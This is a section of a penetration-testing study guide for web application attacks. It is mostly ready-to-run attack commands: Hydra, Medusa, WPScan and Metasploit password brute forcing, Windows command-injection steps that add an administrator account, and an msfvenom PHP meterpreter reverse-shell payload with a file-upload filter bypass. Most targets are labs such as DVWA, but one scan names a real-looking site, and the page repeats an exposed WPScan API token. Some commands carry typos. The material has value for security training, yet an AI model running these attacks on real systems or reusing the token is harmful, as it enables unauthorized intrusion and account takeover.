2. Perform Web applications Attacks

1. Brute force using Burp

set the burp proxy in browser, intercept the request, right click it and send it to intruder.

Now clear the fields and set the targets

sniper if you are only brute forcing password.
cluster if bruteforcing both username and password

set the payload, wordlists and launch attack. Different values of length will indicate the successful attempt.

Other Bruteforcing tools

medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F

Hydra Brute force cheatsheat

# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh
  
 # FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100
 
# If the service isn't running on the default port, use -s
 hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221
  
# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet

# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"

2. Parameter tampering using Burp

In the proxy tab, go to the inspector session where value and name will be visible. You can change it and see the response.

3. Identify XSS using PwnXss

GitHub - pwn0sec/PwnXSS: PwnXSS: Vulnerability (XSS) scanner exploitGitHub

python3 pwnxss.py -u http://testphp.vulnweb.com

4. Exploit Parameter tempering with XSS

5. Perform CSRF attacks

WPSCAN

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp

Add --random-user-agent to avoid firewalls

6. Hack a wordpress site with WPSCAN and Metasploit

Installation

sudo apt update && sudo apt install wpscan 
wpscan --update

Enumerate wordpress users

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u

WPSCAN can be used to enumerate users, themes, plugins etc

wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Now launch the Metasploit with database

service postgresql start
msconsole
use auxillary/scanner/wordpress_login_enum

Now set the options to brute force it

set  PASS_FILE /usr/worlist.txt
set RHOSS 192.168.52.2
set RPORT 8080
set TARGETURI http://dddddd/login
set USERNAME admin
run

WPSCAN brute forcing

wpscan –-url http://cmnatics.playground –-passwords rockyou.txt –-usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Reference

TryHackMe | Cyber Security TrainingTryHackMe

7. Remote command execution to compromise a target server

Setup and complete DVWA Guides

DVWA Walkthrough Step by Step - CavemenTech - Demystifying TechnologyCavemenTech - Demystifying Technology

DVWA Ultimate Guide - First Steps and Walkthrough - Bug HackingBug Hacking

Windows Command Injection

hostname
whoami
tasklist
Taskkill /PID 3112 /F   //forcefully kills the processes
dir c:\
net user
net user test /add     //add a new user
net localgroup Administrators test /add    //add test user to administrators
net user test     //to view the details of the user
dir c:\ "pin.txt" or this command ! Take pin.txt
| type c:\"pin.txt"

8. Exploit File upload vulnerability

Generating the payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php

Run multi/handler to catch the shell

use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp

Check the above DVWA walkthroughs. For high mode add the following on top of payload and save it as jpeg

GIF98a;

Now in command prompt, rename the file

copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php

open the shell, and you will get the meterpreter session.

9. Exploit Log4j vulnerability

Todo

Previous1. Footprint the Web Infrastructure Next3. Detect Web Vulnerabilities using using web application security tools

Last updated 1 year ago